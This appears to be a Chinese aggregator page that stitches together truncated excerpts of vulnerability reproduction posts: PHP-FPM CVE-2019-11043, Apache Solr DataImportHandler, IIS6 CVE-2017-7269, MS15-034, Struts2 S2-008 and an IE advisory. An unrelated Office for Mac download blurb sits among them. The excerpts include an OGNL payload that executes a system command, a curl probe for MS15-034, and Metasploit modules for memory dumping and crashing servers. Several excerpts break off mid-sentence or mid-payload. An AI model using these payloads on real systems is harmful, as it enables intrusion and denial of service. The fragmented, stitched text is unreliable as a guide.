远程代码执行漏洞

PHP-FPM 远程代码执行漏洞(CVE-2019-11043)

一世执手 提交于 2020-03-09 11:45:59
在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 参考链接: https://bugs.php.net/bug.php?id=78599 https://lab.wallarm.com/php-remote-code-execution-0-day-discovered-in-real-world-ctf-exercise/ https://github.com/neex/phuip-fpizdam 漏洞复现: 使用phuip-fpizdam-linux,发送数据包: 可见,这里已经执行成功。 注意,因为php-fpm会启动多个子进程,在访问 /index.php?a=id 时需要多访问几次,以访问到被污染的进程。 来源: https://www.cnblogs.com/yyxianren/p/12447453.html

Apache Solr远程代码执行漏洞 (CVE-2019-0193)复现操作

回眸只為那壹抹淺笑 提交于 2019-12-15 10:49:15
QQ交流学习群:811401950 一. 漏洞描述 2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞(CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置,由于DIH配置可以包含脚本,因此该参数存在安全隐患。攻击者可利用dataConfig参数构造恶意请求,实现远程代码执行,请相关用户尽快升级Solr至安全版本,以确保对此漏洞的有效防护。 二. 复现操作 批量搜一下开了8983端口的主机 2.访问目标主机,找到漏洞的位置,点到 core selector那个按钮,burp抓包拦截 3.发送到repeater,把上图请求的admin 改为item(这里注意对应的模块),后面再加config 查看是否有其配置文件,如果没有配置文件,则说明可能目标不存在这种漏洞,这也是一种检测方式? 4.因为该漏洞所影响的模块可以利用外部的请求来修改,所以利用恶意的请求payload去修改配置,修改了配置过后,就导致可以执行恶意的脚本,从而发起带有恶意代码的请求。 5,修改了配置过后,便可以带上恶意脚本的请求去发起访问了,从而导致了远程代码执行,请求路径内容如下图

IIS6远程代码执行漏洞复现CVE-2017-7269

…衆ロ難τιáo~ 提交于 2019-12-04 16:30:05
简述 CVE-2017-7269是IIS 6.0中存在的一个栈溢出漏洞,在IIS6.0处理PROPFIND指令的时候,由于对url的长度没有进行有效的长度控制和检查,导致执行memcpy对虚拟路径进行构造的时候,引发栈溢出,该漏洞可以导致远程代码执行。 测试环境 受攻击系统:windows server 2003 攻击系统:Kali 2018.04 反弹主机:Ubuntu 18.04 LTS CVE-2017-7269漏洞原理 由恶意的 PROPFIND 请求所引起:当 If 字段包含了 http://localhost/xxxx 这段超长URL时,导致缓冲区溢出(包括栈溢出和堆溢出) 具体位置在w3wp.exe,httpext模块的ScStoragePathFromUrl函数处。 httpext!ScStoragePathFromUrl+0x360 处复制内存时产生了堆溢出 被溢出的堆块在 httpext!HrCheckIfHeader+0x0000013c 处分配; 崩溃所在位置也是从函数 httpext!HrCheckIfHeader 执行过来的; Metasploit5利用EXP Metasploit加载自定义模块 加载自定义模块方法 1、 在home目录里的【$HOME/.msf4/modules/exploits/】里就是自定义的模块 2、

MS15-034测试方法

匿名 (未验证) 提交于 2019-12-03 00:32:02
Range: bytes=0-18446744073709551615 使用 IIS 作为 WEB 容器且使用版本存在编号为 MS-15034 的远程代码执行漏洞。利用该漏洞可轻易使服务器宕机蓝屏。发送测试代码,若返回“ ”证明存在此漏洞。 关于IIS远程代码执行漏洞 针对该漏洞,建议根据官网升级对应漏洞版本补丁。 文章来源: MS15-034测试方法

Apache Struts2远程代码执行漏洞(S2-008)复现

匿名 (未验证) 提交于 2019-12-02 23:57:01
漏洞原理:主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码,传入?debug=command&expression=即可执行OGNL表达式 寻找poc:debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d

微软 Office 2019 for Mac 16.27 多语言共享版 Word Excel PPT

匿名 (未验证) 提交于 2019-12-02 23:49:02
下载地址:风云社区 Word:功能更新 修复了各种性能问题。 Excel:功能更新 修复了各种性能问题。 Excel:安全更新 CVE-2019-1110:Microsoft Excel远程执行代码漏洞 CVE-2019-1111:Microsoft Excel远程执行代码漏洞 PowerPoint:功能更新 修复了各种性能问题。 Outlook:功能更新 从云文件共享附件:轻松将云文件附加到电子邮件中以增强协作。 Outlook:安全更新 CVE-2019-1084:Microsoft Exchange信息泄露漏洞

HTTP.sys 远程代码执行漏洞(CVE-2015-1635/MS15-034)

匿名 (未验证) 提交于 2019-12-02 23:38:02
HTTP.sys 远程代码执行漏洞(CVE-2015-1635/MS15-034) 后来我发现世界真的很大,没有刻意地见面,就真没有再见过了 漏洞概述: 漏洞版本: Windows 7 Windows Server 2008 R2 Windows 8、Windows 8.1 Windows Server 2012、Windows Server 2012 R2 漏洞检测: 简单粗暴一句话,判断是否存在The requested range is not satisfiable。 curl http://ip/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"|grep "The requested range is not satisfiable" 漏洞利用: 获取服务器内存数据 利用msf下的auxiliary/scanner/http/ms15_034_http_sys_memory_dump,设置ip端口即可。 蓝屏攻击 利用msf下的auxiliary/dos/http/ms15_034_ulonglongadd ,设置ip端口即可(生产环境,请勿使用,小心限量版玫瑰金)。 漏洞修复: 打补丁。 余生很长,请多指教。 文章来源: https://blog.csdn.net/csacs/article

PHP-fpm 远程代码执行漏洞(CVE-2019-11043)复现

余生长醉 提交于 2019-12-02 18:45:21
简介 9 月 26 日,PHP 官方发布漏洞通告,其中指出:使用 Nginx + php-fpm 的服务器,在部分配置下,存在远程代码执行漏洞。并且该配置已被广泛使用,危害较大。 漏洞概述 Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。 影响版本 Nginx + php-fpm 的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞。 location ~ [^/]\.php(/|$) { ··· fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... } } 不可以远程代码执行:PHP 7.0/7.1/7.2/7.3 只适用于php7 环境搭建 靶机centos7:https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043 exp环境:kali go语言环境 首先安装 go环境 wget -c https:/

IE 浏览器存在远程代码执行漏洞

最后都变了- 提交于 2019-12-02 06:47:25
周一,微软向用户警告广受欢迎的 Internet Explorer 存在一个高危的漏洞,攻击者利用此漏洞可以接管你的计算机,进而在你的电脑安装和卸载程序,查看、更改或删除数据,甚至创建具有完全用户权限的新帐户。 根据微软发布的安全公告,引发此漏洞的根本原因是 脚本 引擎(Scripting Engine)在内存中处理对象的方式。具体来说就是,Internet Explorer 中的 脚本 引擎在内存中处理对象时存在一个远程代码执行漏洞,该漏洞以这种方式来破坏内存,然后攻击者可以在当前用户的上下文中执行任意代码。  成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限,如果当前用户使用管理员用户权限登录,则攻击者可以控制受影响的系统。然后攻击者会在你的电脑安装和卸载程序,查看、更改或删除数据,甚至创建具有完全用户权限的新帐户。   在基于 Web 的攻击场景中,攻击者可能拥有一个旨在通过 Internet Explorer 利用此漏洞的特制网站,然后诱使用户查看该网站(例如,通过发送钓鱼电子邮件)。   虽然微软已发布安全更新,并通过修改脚本引擎处理内存中对象的方式来解决此漏洞。但微软再次提醒用户放弃这款已被淘汰的浏览器。今年 2 月,微软的安全研究人员就已敦促用户停止使用 IE 作为默认浏览器。后来在四月份的时候,我们得知,即使仅在计算机上安装 Internet Explorer

IE浏览器远程代码执行漏洞(CVE-2019-1367)

我与影子孤独终老i 提交于 2019-11-30 12:28:09
【漏洞预警】IE浏览器远程代码执行漏洞(CVE-2019-1367)预警通告 预警编号:NS-2019-0042 2019-09-24 TAG: IE、远程代码执行、CVE-2019-1367 漏洞危害: 高, 攻击者利用此漏洞,可造成远程代码执行。 版本: 1.0 1 漏洞概述 当地时间 9月 23 日,微软官方发布了一则“IE浏览器累积安全更新”,修复了Internet Explorer中的一个远程代码执行漏洞(CVE-2019-1367)。该漏洞存在于脚本引擎处理IE内存对象的过程中,攻击者可利用此漏洞制定恶意网站,当受害者使用IE访问该网站即可执行任意代码,从而获取系统控制权。 目前微软官方已经发布修复补丁,请相关用户及时进行更新。 参考链接: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1367 https://support.microsoft.com/zh-cn/help/4522007/cumulative-security-update-for-internet-explorer 2 影响范围 受影响版本 Internet Explorer 9 Internet Explorer 10 Internet Explorer 11 3漏洞防护 3.1 官方补丁